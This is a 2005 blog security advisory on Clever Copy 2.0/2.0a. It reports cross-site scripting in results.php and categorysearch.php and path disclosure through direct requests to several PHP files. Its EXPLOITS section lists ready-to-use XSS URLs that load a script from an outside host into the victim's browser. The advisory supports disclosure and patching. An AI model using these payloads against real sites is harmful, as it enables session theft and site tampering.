Clever copy Path disclosure and XSS

Monday, July 18, 2005
################################################
Clever copy Path disclosure and XSS
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-path-disclosure-and-xss.html
vendor notify: yes exploit available:yes
OSVDB ID: 18349,18350,18351,18352,18353,18354,18355,
18356,18357,18358,18359,18360,18361
Secunia: SA16236
BID:14395
################################################

Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System

Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'searchtype' and 'searchterm' variables upon submission to
'results.php' and 'categorysearch.php' scripts.This could allow a user
to create a specially crafted URL that would execute arbitrary code in
a user's browser within the trust relationship between the browser and
the server, leading to a loss of integrity

##############
VERSIONS
##############

Clever Copy version 2.0a
Clever Copy version 2.0

##############
SOLUTION
##############

No solution at this time

##############
TIMELINE
##############

Discovered: 15-07-2005
Vendor notify: 18-07-2005
Vendor response: 18-07-2005
Disclosure: 19-07-2005

##############
EXPLOITS
##############

http://[VICTIM]/results.php?searchtype="><script src="
http://www.drorshalev.com/dev/injection/js.js"></script>
category&searchterm=Announcements

http://[VICTIM]/results.php?searchtype=category&searchterm=">
<scriptsrc="http://www.drorshalev.com/dev/injection/js.js&
quot;></script>Announcements


http://[VICTIM]/results.php?start=0&searchtype="><script
src="http://www.drorshalev.com/dev/injection/js.js"><
/script>category&searchterm=Announcements

http://[VICTIM]/results.php?start=0&searchtypecategory&searchterm=
Announcements="><script src="http://www.drorshalev
.com/dev/injection/js.js"></script>

http://[VICTIM]/categorysearch.php?star=0&searchtype="><
script src="http://www.drorshalev.com/dev/injection/js.js
"></script>category&searchterm=Announcements

http://[VICTIM]/categorysearch.php?star=0&searchtypecategory&
searchterm=Announcements"><script src="http://
www.drorshalev.com/dev/injection/js.js"></script>

################################
direct request path disclosure:
################################

http://[VICTIM]/ticker.php
http://[VICTIM]/menu.php
http://[VICTIM]/banned.php
http://[VICTIM]/endlayout.php
http://[VICTIM]/randomhlinesblock.php
http://[VICTIM]/showlast.php
http://[VICTIM]/showlast5class1.php
http://[VICTIM]/showlast5phorum.php
http://[VICTIM]/showlast5phorumblock.php
http://[VICTIM]/showlastforumbb2.php
http://[VICTIM]/showlastforumbb2block.php


######################## €nd #############################

Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Post by Lostmon in 3:05:00 PM
Categories: , ,
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...